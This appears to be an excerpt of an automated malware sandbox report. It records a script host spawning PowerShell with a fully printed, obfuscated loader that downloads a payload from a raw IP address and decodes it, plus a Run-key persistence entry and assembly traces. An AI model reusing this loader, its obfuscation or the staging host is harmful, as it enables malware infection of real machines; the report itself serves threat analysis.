        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B876F87 push esp; retf 1_2_00007FFD9B876F88
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B871B40 pushad ; iretd 1_2_00007FFD9B871B4D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B87791D push ebx; retf 1_2_00007FFD9B87796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B877958 push ebx; retf 1_2_00007FFD9B87796A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E43F62 push FFFFFF8Bh; iretd 4_2_07E43F6B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E43F29 push FFFFFF8Bh; iretd 4_2_07E43F32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E445F5 push FFFFFF8Bh; retf 4_2_07E44604
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E43D13 push FFFFFF8Bh; retf 4_2_07E43D1C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E4ACBF push FFFFFF8Bh; iretd 4_2_07E4ACC1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E45CBA push FFFFFF8Bh; iretd 4_2_07E45CC8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E45C7E push FFFFFF8Bh; iretd 4_2_07E45C8C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E4AB32 push FFFFFF8Bh; iretd 4_2_07E4AB41
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E4AAC6 push FFFFFF8Bh; iretd 4_2_07E4AAD5
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E4B157 push FFFFFF8Bh; iretd 4_2_07E4B159
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07E4B0EB push FFFFFF8Bh; iretd 4_2_07E4B0ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045209AD push ecx; mov dword ptr [esp], ecx11_2_045209B6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D4050 push ebx; ret 11_2_004D4100
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004EC0CF push eax; ret 11_2_004EC0D1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004C40E6 pushfd ; ret 11_2_004C40E7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004CA35C push cs; ret 11_2_004CA35F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D8648 push edi; retf 11_2_004D8670
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DC6EC push ss; iretd 11_2_004DC6EF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E2786 push edi; ret 11_2_004E279B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E2790 push edi; ret 11_2_004E279B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D680C push ecx; iretd 11_2_004D680D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DAA49 push ds; iretd 11_2_004DAAB8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DAA50 push ds; iretd 11_2_004DAAB8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DAAC3 push ds; iretd 11_2_004DAAB8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D6CDC push cs; retf 11_2_004D6CF9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DCCB5 push edi; ret 11_2_004DCCB6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004D5D6C push 0000004Ah; retf 11_2_004D5D9E
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UX0H5LZH3DGHJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UX0H5LZH3DGHJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
